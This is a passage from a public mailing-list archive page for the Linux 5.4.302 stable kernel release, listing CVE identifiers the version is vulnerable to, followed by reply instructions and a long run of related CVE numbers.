    5.4.302 is vulnerable to CVE-2025-40107
    5.4.302 is vulnerable to CVE-2025-40110
    5.4.302 is vulnerable to CVE-2025-40123
    5.4.302 is vulnerable to CVE-2025-40135
    5.4.302 is vulnerable to CVE-2025-40137
    5.4.302 is vulnerable to CVE-2025-40139
    5.4.302 is vulnerable to CVE-2025-40146
    5.4.302 is vulnerable to CVE-2025-40149
    5.4.302 is vulnerable to CVE-2025-40158
    5.4.302 is vulnerable to CVE-2025-40160
    5.4.302 is vulnerable to CVE-2025-40164
    5.4.302 is vulnerable to CVE-2025-40168
    5.4.302 is vulnerable to CVE-2025-40170
    5.4.302 is vulnerable to CVE-2025-40180
    5.4.302 is vulnerable to CVE-2025-40193
    5.4.302 is vulnerable to CVE-2025-40195
    5.4.302 is vulnerable to CVE-2025-40196
    5.4.302 is vulnerable to CVE-2025-40206
    5.4.302 is vulnerable to CVE-2025-40210
    5.4.302 is vulnerable to CVE-2025-40300

    Total Vulnerable CVE's in 5.4.302 : 1539


     prev parent reply  other threads:[~2025-12-03 12:50 UTC|newest]

Thread overview: 3+ messages / expand[flat|nested]  mbox.gz  Atom feed  top
2025-12-03 12:12 Linux 5.4.302 Greg Kroah-Hartman
2025-12-03 12:12 ` Greg Kroah-Hartman
2025-12-03 12:50 ` Greg Kroah-Hartman [this message]


Reply instructions:

You may reply publicly to this message via plain-text email
using any one of the following methods:

* Save the following mbox file, import it into your mail client,
  and reply-to-all from there: mbox

  Avoid top-posting and favor interleaved quoting:
  https://en.wikipedia.org/wiki/Posting_style#Interleaved_style

* Reply using the --to, --cc, and --in-reply-to
  switches of git-send-email(1):

  git send-email \
    --in-reply-to=2025120358-skating-outage-7c61@gregkh \
    --to=gregkh@linuxfoundation.org \
    --cc=akpm@linux-foundation.org \
    --cc=jslaby@suse.cz \
    --cc=linux-kernel@vger.kernel.org \
    --cc=lwn@lwn.net \
    --cc=stable@vger.kernel.org \
    --cc=torvalds@linux-foundation.org \
    /path/to/YOUR_REPLY

  https://kernel.org/pub/software/scm/git/docs/git-send-email.html

* If your mail client supports setting the In-Reply-To header
  via mailto: links, try the mailto: link

Be sure your reply has a Subject: header at the top and a blank line before the message body.


This is an external index of several public inboxes,
see mirroring instructions on how to clone and mirror
all data and code used by this external index.


Related vulnerabilities: CVE-2025-39707CVE-2022-49873CVE-2022-50556CVE-2024-40972CVE-2024-50095CVE-2023-53171CVE-2023-53367CVE-2023-53402CVE-2022-50086CVE-2024-46730CVE-2024-36952CVE-2025-38436CVE-2023-53418CVE-2024-27002CVE-2024-44938CVE-2024-43877CVE-2025-21821CVE-2023-53620CVE-2022-49813CVE-2025-21738CVE-2022-50256CVE-2024-50073CVE-2024-36901CVE-2024-53190CVE-2025-37967CVE-2022-49997CVE-2025-40104CVE-2024-47693CVE-2024-36938CVE-2023-53685CVE-2025-38198CVE-2025-39800CVE-2022-49328CVE-2023-52926CVE-2025-39929CVE-2024-46720CVE-2025-38512CVE-2022-50300CVE-2025-21796CVE-2024-49918CVE-2024-41008CVE-2024-58053CVE-2021-47101CVE-2025-37745CVE-2024-44963CVE-2024-42080CVE-2022-49799CVE-2025-40053CVE-2025-22109CVE-2023-52586CVE-2025-21912CVE-2023-52750CVE-2024-50067CVE-2024-47690CVE-2022-49610CVE-2024-36911CVE-2025-23156CVE-2024-42321CVE-2024-46806CVE-2022-49901CVE-2022-50552CVE-2023-53257CVE-2024-50289CVE-2024-42322CVE-2023-53499CVE-2021-47523CVE-2022-49226CVE-2022-49449CVE-2020-36776CVE-2025-38560CVE-2024-56775CVE-2022-49603CVE-2021-47544CVE-2022-48826CVE-2022-49728CVE-2024-56551CVE-2024-36923CVE-2022-49766CVE-2023-53383CVE-2023-53410CVE-2024-44958CVE-2024-49974CVE-2025-38645CVE-2025-22055CVE-2022-48961CVE-2024-40927CVE-2023-52754CVE-2024-57809CVE-2022-50571CVE-2024-58094CVE-2023-52639CVE-2025-38499CVE-2024-35875CVE-2023-52491CVE-2022-50036CVE-2022-49998CVE-2022-50443CVE-2024-56698CVE-2024-49861CVE-2022-49540CVE-2022-49069CVE-2021-47191CVE-2023-53178CVE-2025-38257CVE-2023-53574CVE-2024-26846CVE-2023-53412CVE-2024-38546CVE-2025-39838CVE-2024-39479CVE-2024-57838CVE-2024-49569CVE-2024-42253CVE-2021-47061CVE-2024-36244CVE-2022-49542CVE-2025-38614CVE-2024-26960CVE-2025-40075CVE-2023-53718CVE-2024-43831CVE-2025-38310CVE-2025-23132CVE-2023-53074CVE-2024-56647CVE-2021-47452CVE-2024-27056CVE-2022-49831CVE-2024-26743CVE-2022-50114CVE-2023-52515CVE-2024-46776CVE-2024-58034CVE-2024-56651CVE-2025-40139CVE-2025-38272CVE-2022-49027CVE-2021-47070CVE-2024-46809CVE-2025-22090CVE-2024-49854CVE-2022-49534CVE-2022-49000CVE-2023-53103CVE-2025-38704CVE-2024-35848CVE-2024-26907CVE-2025-39685CVE-2023-53200CVE-2025-39702CVE-2025-38039CVE-2022-49065CVE-2022-49028CVE-2022-50163CVE-2024-44941CVE-2022-49107CVE-2022-50174CVE-2024-43892CVE-2024-56722CVE-2021-46987CVE-2024-43819CVE-2022-48674CVE-2024-50135CVE-2022-49138CVE-2023-52671CVE-2024-57887CVE-2025-38710CVE-2021-47508CVE-2024-53168CVE-2022-48953CVE-2025-40021CVE-2024-49899CVE-2022-49980CVE-2024-40970CVE-2022-48909CVE-2024-46726CVE-2024-38545CVE-2024-46826CVE-2025-22121CVE-2022-49566CVE-2024-27032CVE-2024-49898CVE-2025-37877CVE-2021-47004CVE-2025-39819CVE-2021-47116CVE-2024-41013CVE-2022-49823CVE-2024-46729CVE-2024-46832CVE-2024-26844CVE-2024-46753CVE-2024-57903CVE-2022-50073CVE-2023-52642CVE-2023-53441CVE-2024-42158CVE-2025-39697CVE-2024-26585CVE-2023-53432CVE-2023-53577CVE-2022-50144CVE-2020-36788CVE-2023-53405CVE-2022-49531CVE-2021-47479CVE-2025-40168CVE-2023-52517CVE-2024-57899CVE-2025-38623CVE-2025-39705CVE-2025-22027CVE-2024-35843CVE-2024-41079CVE-2024-36922CVE-2023-53097CVE-2022-49104CVE-2021-47362CVE-2024-58240CVE-2024-53100CVE-2022-50350CVE-2024-44950CVE-2025-21766CVE-2025-38143CVE-2023-53447CVE-2024-49891CVE-2025-37954CVE-2024-49859CVE-2022-50385CVE-2024-49950CVE-2025-38068CVE-2022-49129CVE-2024-47735CVE-2024-49911CVE-2023-53173CVE-2022-49241CVE-2022-49630CVE-2021-47211CVE-2024-41048CVE-2024-53058CVE-2023-53517CVE-2025-38045CVE-2025-38269CVE-2021-47226CVE-2024-40977CVE-2025-21690CVE-2025-39797CVE-2025-38071CVE-2022-50066CVE-2024-46681CVE-2024-38556CVE-2025-21750CVE-2024-27037CVE-2022-50388CVE-2024-27014CVE-2024-42160CVE-2024-46810CVE-2024-35837CVE-2024-40910CVE-2023-53039CVE-2024-53210CVE-2024-46825CVE-2025-21759CVE-2024-35887CVE-2025-39762CVE-2024-35999CVE-2024-40971CVE-2023-52811CVE-2021-47432CVE-2021-47281CVE-2023-53230CVE-2023-52878CVE-2024-44940CVE-2024-36910CVE-2024-50282CVE-2024-42155CVE-2022-50172CVE-2022-49158CVE-2022-49938CVE-2022-48901CVE-2023-53540CVE-2025-37867CVE-2021-47559CVE-2024-41069CVE-2024-56565CVE-2022-49979CVE-2024-50183CVE-2022-49428CVE-2025-22125CVE-2025-22072CVE-2023-52815CVE-2023-53020CVE-2025-38264CVE-2022-49851CVE-2024-35998CVE-2024-38608CVE-2024-56664CVE-2024-57843CVE-2023-53494CVE-2025-38189CVE-2023-53098CVE-2023-53225CVE-2023-53712CVE-2025-39795CVE-2023-52831CVE-2025-38576CVE-2024-57883CVE-2024-46716CVE-2022-50471CVE-2023-53038CVE-2025-39693CVE-2024-42120CVE-2022-49528CVE-2021-47490CVE-2024-35929CVE-2024-56636CVE-2024-42252CVE-2024-50061CVE-2024-36024CVE-2024-46802CVE-2023-53282CVE-2024-43907CVE-2024-58241CVE-2025-38218CVE-2024-39484CVE-2024-50211CVE-2024-50304CVE-2024-26866CVE-2023-52732CVE-2024-26962CVE-2025-39957CVE-2025-38683CVE-2023-53387CVE-2024-47678CVE-2023-53606CVE-2022-49182CVE-2024-56787CVE-2022-49178CVE-2024-56583CVE-2024-50196CVE-2024-57896CVE-2024-40967CVE-2024-49908CVE-2022-50103CVE-2023-53627CVE-2024-42135CVE-2025-37925CVE-2022-50356CVE-2024-35945CVE-2024-26584CVE-2022-48769CVE-2022-49174CVE-2025-37852CVE-2024-43902CVE-2022-50181CVE-2025-21629CVE-2023-53411CVE-2023-53607CVE-2024-38632CVE-2024-26842CVE-2023-52610CVE-2022-49635CVE-2025-37878CVE-2024-26595CVE-2024-47809CVE-2022-50166CVE-2022-49622CVE-2024-42098CVE-2022-49519CVE-2024-38581CVE-2024-53088CVE-2024-26715CVE-2025-38048CVE-2022-49698CVE-2024-49929CVE-2022-49743CVE-2024-36479CVE-2024-42267CVE-2023-53393CVE-2022-49430CVE-2025-38595CVE-2021-47412CVE-2023-53476CVE-2025-38263CVE-2023-52481CVE-2024-46807CVE-2023-52757CVE-2025-39865CVE-2022-50304CVE-2022-50527CVE-2022-50098CVE-2023-53483CVE-2025-38679CVE-2024-46871CVE-2023-52588CVE-2022-50493CVE-2025-21651CVE-2022-48763CVE-2024-35869CVE-2022-50146CVE-2023-53353CVE-2022-49555CVE-2022-48664CVE-2023-53094CVE-2023-52625CVE-2022-49112CVE-2022-50306CVE-2023-53270CVE-2021-47366CVE-2023-53413CVE-2024-26689CVE-2024-26906CVE-2025-40164CVE-2024-26759CVE-2023-53348CVE-2023-53111CVE-2023-53714CVE-2024-57924CVE-2025-39931CVE-2024-53220CVE-2024-39490CVE-2022-50582CVE-2025-39746CVE-2023-53647CVE-2024-26872CVE-2024-26747CVE-2025-21976CVE-2023-53596CVE-2024-35784CVE-2025-39873CVE-2023-53408CVE-2024-26988CVE-2025-40149CVE-2021-47005CVE-2024-49915CVE-2024-36903CVE-2024-50280CVE-2024-47143CVE-2021-47580CVE-2024-41005CVE-2024-53128CVE-2022-49161CVE-2022-49361CVE-2024-41067CVE-2023-52511CVE-2022-48765CVE-2023-53605CVE-2021-47618CVE-2025-40180CVE-2023-53671CVE-2024-38597CVE-2024-46821CVE-2025-23131CVE-2022-50492CVE-2025-40195CVE-2022-49319CVE-2023-52763CVE-2024-53095CVE-2023-53529CVE-2022-49246CVE-2023-52925CVE-2021-47131CVE-2024-53179CVE-2024-36953CVE-2024-39482CVE-2025-38099CVE-2024-26726CVE-2024-26928CVE-2024-47141CVE-2025-38333CVE-2021-47119CVE-2024-46702CVE-2024-54458CVE-2024-27012CVE-2024-46812CVE-2023-53105CVE-2025-37884CVE-2022-49420CVE-2023-53370CVE-2021-46925CVE-2022-49234CVE-2022-49194CVE-2022-50392CVE-2022-50233CVE-2022-48863CVE-2024-57893CVE-2024-43863CVE-2024-35940CVE-2024-35932CVE-2022-50011CVE-2022-49097CVE-2022-49504CVE-2025-37834CVE-2023-52939CVE-2023-53624CVE-2023-53416CVE-2021-47113CVE-2024-50060CVE-2022-48943CVE-2023-52766CVE-2023-53545CVE-2024-39508CVE-2022-48893CVE-2024-42319CVE-2024-26876CVE-2023-53429CVE-2024-56544CVE-2025-39827CVE-2024-26656CVE-2022-49267CVE-2025-38728CVE-2024-45828CVE-2023-53133CVE-2025-38734CVE-2024-47704CVE-2024-49970CVE-2022-49154CVE-2022-49172CVE-2025-21634CVE-2025-40300CVE-2024-36968CVE-2024-26769CVE-2023-53482CVE-2024-26686CVE-2024-58089CVE-2024-58005CVE-2022-49135CVE-2024-50047CVE-2022-50320CVE-2023-53248CVE-2022-49935CVE-2024-27408CVE-2022-48706CVE-2024-35803CVE-2024-35896CVE-2025-40064CVE-2024-42225CVE-2025-38410CVE-2025-39866CVE-2025-37951CVE-2022-49989CVE-2023-53588CVE-2025-38041CVE-2022-50015CVE-2024-46695CVE-2024-53090CVE-2022-50516CVE-2024-50017CVE-2022-50539CVE-2024-49992CVE-2024-57974CVE-2022-49317CVE-2024-44986CVE-2021-47653CVE-2023-52916CVE-2022-49696CVE-2025-38716CVE-2025-38040CVE-2024-27403CVE-2025-38063CVE-2025-40137CVE-2025-38094CVE-2023-53404CVE-2022-49932CVE-2022-49640CVE-2022-49899CVE-2023-53696CVE-2024-57888CVE-2024-56703CVE-2025-21891CVE-2024-42123CVE-2022-49837CVE-2022-50293CVE-2022-50560CVE-2024-46841CVE-2023-53581CVE-2025-39738CVE-2023-53247CVE-2024-35839CVE-2024-27011CVE-2022-49054CVE-2022-49513CVE-2022-49900CVE-2023-52762CVE-2024-26583CVE-2023-52741CVE-2022-49585CVE-2025-38425CVE-2025-38426CVE-2024-56611CVE-2024-26771CVE-2022-49188CVE-2021-47623CVE-2023-52888CVE-2023-53347CVE-2024-50187CVE-2022-49312CVE-2022-49521CVE-2022-50065CVE-2024-26672CVE-2023-52590CVE-2024-43905CVE-2024-49937CVE-2025-37963CVE-2023-53470CVE-2022-49323CVE-2021-47247CVE-2023-53586CVE-2024-56640CVE-2021-47359CVE-2022-48875CVE-2022-49398CVE-2022-50453CVE-2024-42118CVE-2023-52652CVE-2022-50374CVE-2022-49289CVE-2022-49440CVE-2023-53008CVE-2022-48755CVE-2020-36784CVE-2024-42156CVE-2025-22103CVE-2022-49623CVE-2025-38119CVE-2021-47414CVE-2023-52812CVE-2025-22008CVE-2024-35863CVE-2022-49512CVE-2025-38280CVE-2022-49761CVE-2023-53699CVE-2024-56778CVE-2022-49535CVE-2024-26775CVE-2025-37980CVE-2022-48844CVE-2025-39760CVE-2023-53539CVE-2025-40135CVE-2024-53224CVE-2024-26948CVE-2021-47577CVE-2025-39683CVE-2024-50166CVE-2025-38524CVE-2024-35790CVE-2024-26920CVE-2022-50120CVE-2023-52833CVE-2024-49921CVE-2022-48796CVE-2022-50488CVE-2023-52614CVE-2024-56701CVE-2022-50393CVE-2025-39949CVE-2022-49157CVE-2023-53594CVE-2024-49912CVE-2023-53530CVE-2024-50191CVE-2025-39964CVE-2024-50003CVE-2025-38438CVE-2021-47205CVE-2024-42147CVE-2023-53473CVE-2025-37739CVE-2024-56566CVE-2022-48920CVE-2025-37885CVE-2022-48628CVE-2024-50256CVE-2025-38319CVE-2024-57875CVE-2023-53409CVE-2022-50550CVE-2024-53218CVE-2022-49546CVE-2024-26913CVE-2023-53093CVE-2025-37756CVE-2024-27062CVE-2023-53391CVE-2023-53733CVE-2022-50021CVE-2024-41077CVE-2025-21801CVE-2025-37942CVE-2024-26869CVE-2022-49109CVE-2024-47726CVE-2024-41093CVE-2024-26691CVE-2024-43899CVE-2025-21894CVE-2023-52854CVE-2024-40911CVE-2024-42082CVE-2024-49905CVE-2025-39789CVE-2025-39901CVE-2024-47665CVE-2024-49934CVE-2024-36949CVE-2022-49285CVE-2024-50217CVE-2025-38064CVE-2022-49720CVE-2021-47408CVE-2025-37992CVE-2025-38556CVE-2024-38591CVE-2025-39764CVE-2024-36909CVE-2022-50417CVE-2024-44942CVE-2024-35995CVE-2024-36927CVE-2024-35951CVE-2021-47024CVE-2022-49156CVE-2023-52635CVE-2024-40947CVE-2025-38192CVE-2023-53707CVE-2024-40990CVE-2022-49124CVE-2025-38676CVE-2022-50024CVE-2024-49893CVE-2023-52752CVE-2024-35862CVE-2021-47339CVE-2024-26640CVE-2024-26807CVE-2024-35808CVE-2023-53419CVE-2024-56591CVE-2025-39754CVE-2025-39932CVE-2024-46733CVE-2022-49563CVE-2023-53249CVE-2025-40099CVE-2025-21820CVE-2022-49651CVE-2024-52559CVE-2021-47001CVE-2023-53332CVE-2024-41000CVE-2025-40036CVE-2024-26739CVE-2025-21726CVE-2024-53094CVE-2025-38161CVE-2023-53417CVE-2024-47660CVE-2025-39990CVE-2022-49764CVE-2024-26758CVE-2024-53187CVE-2025-39684CVE-2025-40094CVE-2025-38259CVE-2022-50407CVE-2024-40966CVE-2024-47683CVE-2024-41082CVE-2022-49711CVE-2021-47381CVE-2023-52828CVE-2024-26622CVE-2024-26641CVE-2024-46717CVE-2024-46787CVE-2022-48792CVE-2024-42312CVE-2025-23148CVE-2025-37849CVE-2023-52633CVE-2024-41060CVE-2024-26996CVE-2024-26700CVE-2022-50226CVE-2024-46823CVE-2022-50562CVE-2022-50167CVE-2025-38706CVE-2024-56604CVE-2022-49119CVE-2024-36897CVE-2024-46842CVE-2021-47158CVE-2023-53469CVE-2024-46870CVE-2025-38126CVE-2025-40100CVE-2024-46751CVE-2023-53684CVE-2023-53217CVE-2024-53093CVE-2024-50112CVE-2022-49046CVE-2022-49765CVE-2024-26706CVE-2024-26830CVE-2023-53335CVE-2022-50500CVE-2024-46760CVE-2025-40123CVE-2022-49723CVE-2022-48950CVE-2025-38665CVE-2025-38095CVE-2022-48761CVE-2024-35826CVE-2025-39952CVE-2022-49360CVE-2024-49919CVE-2023-52488CVE-2025-21780CVE-2024-50036CVE-2025-23161CVE-2024-53079CVE-2024-50062CVE-2025-40025CVE-2025-38117CVE-2024-53219CVE-2024-56662CVE-2024-46770CVE-2022-48642CVE-2024-35864CVE-2022-49502CVE-2024-35904CVE-2022-48825CVE-2025-38527CVE-2023-53183CVE-2022-49641CVE-2024-26947CVE-2022-50554CVE-2022-49749CVE-2024-36917CVE-2024-53206CVE-2025-40082CVE-2025-40102CVE-2025-37882CVE-2022-49923CVE-2024-39497CVE-2025-37830CVE-2023-52975CVE-2024-26719CVE-2025-38685CVE-2022-50467CVE-2023-53079CVE-2024-40918CVE-2025-39770CVE-2025-37801CVE-2021-47473CVE-2024-43904CVE-2025-38361CVE-2024-27415CVE-2022-49102CVE-2022-48975CVE-2024-49895CVE-2025-21792CVE-2024-26607CVE-2024-38611CVE-2023-53244CVE-2022-49618CVE-2022-48733CVE-2024-37354CVE-2024-35870CVE-2024-47658CVE-2025-39753CVE-2025-21881CVE-2024-26629CVE-2025-38709CVE-2022-49465CVE-2024-46811CVE-2024-26589CVE-2024-42077CVE-2023-53708CVE-2024-56623CVE-2022-49885CVE-2024-43866CVE-2022-49103CVE-2024-42110CVE-2023-52653CVE-2025-38591CVE-2022-49296CVE-2025-22104CVE-2023-53618CVE-2024-46813CVE-2024-40973CVE-2025-37880CVE-2023-53279CVE-2022-49664CVE-2024-43901CVE-2023-53091CVE-2022-50138CVE-2025-40110CVE-2023-53461CVE-2024-54683CVE-2021-47578CVE-2021-47335CVE-2025-37742CVE-2025-38067CVE-2024-41076CVE-2022-50364CVE-2025-39863CVE-2024-41001CVE-2024-40965CVE-2025-38080CVE-2022-49742CVE-2022-50053CVE-2024-44982CVE-2022-49168CVE-2025-38584CVE-2022-49134CVE-2025-38321CVE-2021-47599CVE-2024-50038CVE-2025-21969CVE-2024-46859CVE-2022-49496CVE-2022-50335CVE-2023-53326CVE-2021-47648CVE-2024-49991CVE-2024-53180CVE-2025-37853CVE-2022-49120CVE-2024-57984CVE-2024-36908CVE-2025-40074CVE-2024-46731CVE-2024-56609CVE-2023-53250CVE-2025-40206CVE-2024-57898CVE-2023-53080CVE-2024-38570CVE-2025-40093CVE-2022-50175CVE-2024-57939CVE-2024-35943CVE-2022-49072CVE-2024-40969CVE-2024-56763CVE-2024-36029CVE-2024-26828CVE-2023-53512CVE-2021-47433CVE-2023-53231CVE-2025-38656CVE-2023-52489CVE-2022-50023CVE-2024-53051CVE-2023-53503CVE-2023-52834CVE-2022-49294CVE-2022-48887CVE-2025-21899CVE-2025-38342CVE-2022-50328CVE-2023-53513CVE-2024-50056CVE-2024-26740CVE-2025-21927CVE-2025-40107CVE-2023-53286CVE-2025-39677CVE-2025-39825CVE-2024-43834CVE-2024-56641CVE-2022-50159CVE-2023-52484CVE-2024-26756CVE-2021-46926CVE-2024-53195CVE-2024-50015CVE-2024-41066CVE-2025-39748CVE-2023-53520CVE-2024-26914CVE-2025-38022CVE-2022-50580CVE-2023-53460CVE-2022-49190CVE-2022-49632CVE-2024-40999CVE-2024-26930CVE-2022-50224CVE-2022-49376CVE-2025-39925CVE-2023-52474CVE-2024-38580CVE-2022-48952CVE-2024-49571CVE-2024-27019CVE-2024-41014CVE-2021-47077CVE-2023-53406CVE-2024-38553CVE-2025-39773CVE-2024-47661CVE-2024-47691CVE-2025-37833CVE-2024-46762CVE-2024-46725CVE-2021-47253CVE-2022-49838CVE-2023-52500CVE-2024-36009CVE-2022-48865CVE-2024-57976CVE-2024-46732CVE-2024-56369CVE-2022-48811CVE-2023-53209CVE-2022-48721CVE-2025-39716CVE-2024-49889CVE-2022-49937CVE-2023-53359CVE-2021-47283CVE-2025-38717CVE-2022-49281CVE-2023-53651CVE-2025-38422CVE-2024-42114CVE-2021-47049CVE-2025-38644CVE-2022-50009CVE-2024-50058CVE-2021-47198CVE-2024-50258CVE-2022-49470CVE-2025-37961CVE-2023-52485CVE-2024-50115CVE-2024-26961CVE-2023-53241CVE-2022-49325CVE-2023-53010CVE-2024-49923CVE-2022-49497CVE-2022-50116CVE-2022-50369CVE-2021-47632CVE-2025-40080CVE-2024-36880CVE-2023-53201CVE-2024-38662CVE-2022-49967CVE-2022-49541CVE-2024-26659CVE-2024-49875CVE-2022-49219CVE-2021-47504CVE-2023-53576CVE-2023-53131CVE-2024-47745CVE-2024-53052CVE-2022-48633CVE-2025-22026CVE-2025-38503CVE-2024-36023CVE-2024-26900CVE-2024-48875CVE-2024-50125CVE-2025-21648CVE-2021-47399CVE-2023-52737CVE-2024-50272CVE-2024-53114CVE-2021-46941CVE-2024-27054CVE-2022-50236CVE-2024-35865CVE-2025-38062CVE-2021-47610CVE-2023-52664CVE-2025-37800CVE-2024-26733CVE-2024-49940CVE-2024-53234CVE-2022-48827CVE-2022-49579CVE-2024-46752CVE-2024-46727CVE-2023-53197CVE-2024-49913CVE-2023-53261CVE-2021-47219CVE-2023-53438CVE-2025-40146CVE-2022-49824CVE-2024-57982CVE-2025-38073CVE-2024-35934CVE-2025-37768CVE-2024-57975CVE-2024-36969CVE-2023-53390CVE-2024-49917CVE-2021-47265CVE-2024-40976CVE-2024-56590CVE-2023-53584CVE-2024-46774CVE-2022-49564CVE-2022-50060CVE-2022-49578CVE-2024-46860CVE-2024-50014CVE-2023-53149CVE-2025-40092CVE-2022-49121CVE-2021-47410CVE-2022-49545CVE-2022-50400CVE-2024-56584CVE-2022-49201CVE-2022-49118CVE-2025-38624CVE-2022-49898CVE-2021-47407CVE-2025-39905CVE-2024-35967CVE-2025-21931CVE-2024-56614CVE-2024-40929CVE-2023-53292CVE-2024-56658CVE-2024-47728CVE-2022-50406CVE-2025-21758CVE-2021-47331CVE-2023-53355CVE-2024-35949CVE-2025-22053CVE-2025-21734CVE-2024-46724CVE-2021-47212CVE-2024-50010CVE-2021-47074CVE-2025-38159CVE-2024-49989CVE-2022-48902CVE-2023-52638CVE-2024-35791CVE-2025-37911CVE-2024-56776CVE-2023-53254CVE-2024-27402CVE-2022-49311CVE-2025-38359CVE-2024-49945CVE-2024-46848CVE-2024-46754CVE-2025-38105CVE-2023-53661CVE-2022-49342CVE-2021-47492CVE-2023-53334CVE-2025-39706CVE-2023-52458CVE-2022-50512CVE-2024-42244CVE-2024-35966CVE-2024-49922CVE-2025-39801CVE-2025-40196CVE-2022-48791CVE-2022-50266CVE-2024-43817CVE-2022-49196CVE-2025-37856CVE-2022-49327CVE-2024-35861CVE-2023-52531CVE-2023-53510CVE-2025-38531CVE-2022-50132CVE-2025-21941CVE-2024-44949CVE-2025-37928CVE-2024-42128CVE-2022-50410CVE-2021-47183CVE-2024-50298CVE-2022-50373CVE-2024-46808CVE-2022-49829CVE-2022-50267CVE-2024-49910CVE-2024-49858CVE-2024-46773CVE-2025-39833CVE-2025-22083CVE-2024-43872CVE-2022-49924CVE-2024-46715CVE-2022-50241CVE-2022-49812CVE-2022-49892CVE-2024-36924CVE-2023-52761CVE-2024-47673CVE-2025-37836CVE-2024-35931CVE-2023-53579CVE-2024-58093CVE-2025-38107CVE-2024-56599CVE-2024-26915CVE-2024-47739CVE-2024-57897CVE-2022-50378CVE-2025-37842CVE-2025-39772CVE-2022-49106CVE-2023-52669CVE-2023-52903CVE-2021-47076CVE-2025-38112CVE-2022-48740CVE-2023-53538CVE-2025-39759CVE-2022-49730CVE-2023-53287CVE-2025-22025CVE-2024-49920CVE-2022-49839CVE-2024-38620CVE-2023-53682CVE-2022-49445CVE-2023-52826CVE-2023-52476CVE-2025-21712CVE-2024-56759CVE-2025-21802CVE-2022-49026CVE-2025-38207CVE-2024-46834CVE-2024-40998CVE-2024-26614CVE-2025-39927CVE-2024-49916CVE-2025-40103CVE-2024-49897CVE-2023-52886CVE-2024-49932CVE-2025-21831CVE-2025-21838CVE-2022-49142CVE-2025-38384CVE-2024-57857CVE-2025-39961CVE-2023-53625CVE-2024-49907CVE-2024-36951CVE-2025-39829CVE-2024-56533CVE-2025-40095CVE-2025-40043CVE-2022-48802CVE-2022-50316CVE-2024-37021CVE-2022-49666CVE-2025-38449CVE-2021-47582CVE-2025-38085CVE-2024-41078CVE-2022-50472CVE-2022-48744CVE-2025-39763CVE-2025-39826CVE-2025-38232CVE-2024-35878CVE-2024-35247CVE-2022-50469CVE-2025-37770CVE-2022-50204CVE-2024-49926CVE-2024-49901CVE-2024-56712CVE-2023-53042CVE-2023-53562CVE-2023-52482CVE-2023-52781CVE-2021-47234CVE-2025-38702CVE-2025-40158CVE-2022-49437CVE-2024-49890CVE-2024-56616CVE-2022-49562CVE-2025-22028CVE-2024-42129CVE-2025-21727CVE-2025-37807CVE-2024-46763CVE-2025-22022CVE-2023-53635CVE-2025-40210CVE-2022-49650CVE-2024-35868CVE-2024-42122CVE-2025-38069CVE-2025-39933CVE-2022-49170CVE-2024-26677CVE-2024-50057CVE-2024-44939CVE-2021-47193CVE-2024-36914CVE-2025-40160CVE-2022-50518CVE-2025-21711CVE-2025-39744CVE-2024-56592CVE-2024-49906CVE-2025-38009CVE-2024-26891CVE-2025-38409CVE-2022-48979CVE-2025-21635CVE-2022-49658CVE-2024-50277CVE-2024-58016CVE-2023-53068CVE-2023-53491CVE-2024-35871CVE-2024-43909CVE-2024-56782CVE-2024-45015CVE-2022-50340CVE-2025-38096CVE-2024-56692CVE-2022-48712CVE-2024-53241CVE-2025-21768CVE-2023-52920CVE-2023-52736CVE-2022-49758CVE-2024-44972CVE-2025-39745CVE-2022-49110CVE-2024-35939CVE-2025-38250CVE-2024-26668CVE-2024-53685CVE-2025-21855CVE-2022-49536CVE-2024-53177CVE-2024-41073CVE-2025-38261CVE-2025-38643CVE-2025-22010CVE-2025-38084CVE-2025-22107CVE-2022-49825CVE-2023-52814CVE-2024-42079CVE-2025-38705CVE-2025-38331CVE-2021-47455CVE-2025-39810CVE-2021-47498CVE-2024-42067CVE-2024-35867CVE-2024-46857CVE-2024-56785CVE-2025-39940CVE-2025-21812CVE-2025-38544CVE-2021-47622CVE-2023-52808CVE-2025-22057CVE-2021-47501CVE-2021-47491CVE-2022-50082CVE-2024-38630CVE-2025-38166CVE-2024-47666CVE-2024-38602CVE-2024-46816CVE-2024-46713CVE-2022-49303CVE-2022-49468CVE-2024-46775CVE-2023-52700CVE-2024-35866CVE-2023-53152CVE-2022-49215CVE-2025-38363CVE-2023-52591CVE-2021-47275CVE-2022-49822CVE-2024-56589CVE-2023-52498CVE-2025-39726CVE-2022-49828CVE-2022-50151CVE-2024-53144CVE-2023-53544CVE-2025-39781CVE-2022-50260CVE-2022-49443CVE-2024-43900CVE-2024-39507CVE-2024-58095CVE-2024-49914CVE-2022-50129CVE-2024-35794CVE-2024-26757CVE-2024-27051CVE-2023-53054CVE-2022-49164CVE-2021-47378CVE-2023-52629CVE-2024-26586CVE-2025-38129CVE-2025-39747CVE-2025-37920CVE-2021-47188CVE-2024-49863CVE-2024-44957CVE-2024-26712CVE-2024-26795CVE-2021-47063CVE-2022-49453CVE-2024-49881CVE-2021-47143CVE-2024-42130CVE-2021-47560CVE-2023-53407CVE-2024-26865CVE-2025-38208CVE-2025-21779CVE-2025-39686CVE-2023-52621CVE-2021-47493CVE-2024-41080CVE-2024-35965CVE-2024-35799CVE-2022-49444CVE-2024-56777CVE-2024-26938CVE-2025-37948CVE-2024-27010CVE-2025-21816CVE-2023-52674CVE-2023-52821CVE-2024-42296CVE-2023-52561CVE-2023-52516CVE-2022-50303CVE-2024-36013CVE-2024-26669CVE-2022-48751CVE-2022-49390CVE-2024-42068CVE-2022-49169CVE-2024-43912CVE-2023-52596CVE-2024-41935CVE-2024-56608CVE-2025-40003CVE-2022-48852CVE-2024-56568CVE-2021-47635CVE-2025-39715CVE-2021-47438CVE-2024-42063CVE-2021-47428CVE-2022-50016CVE-2022-48833CVE-2024-42121CVE-2024-27072CVE-2024-49927CVE-2025-21985CVE-2025-40193CVE-2022-50445CVE-2021-46928CVE-2024-36915CVE-2025-38684CVE-2021-47182CVE-2025-38215CVE-2025-40005CVE-2024-53050CVE-2022-49149CVE-2022-50412CVE-2022-49309CVE-2024-46707CVE-2023-52751CVE-2021-47391CVE-2023-53218CVE-2023-53414CVE-2024-56751CVE-2025-40170CVE-2025-38074CVE-2025-37879CVE-2023-53415CVE-2024-57872CVE-2023-53509CVE-2023-53680CVE-2025-39958CVE-2022-48673CVE-2025-37883CVE-2024-56588CVE-2022-49599CVE-2024-57795CVE-2022-49258CVE-2024-41023CVE-2025-22060CVE-2024-38554CVE-2024-41062CVE-2021-47552CVE-2024-46728CVE-2024-49925CVE-2024-49968CVE-2024-53216CVE-2024-46772CVE-2023-53403CVE-2023-52624CVE-2024-46819CVE-2025-23141CVE-2025-38626CVE-2023-52680CVE-2025-38234CVE-2025-21682CVE-2024-26787CVE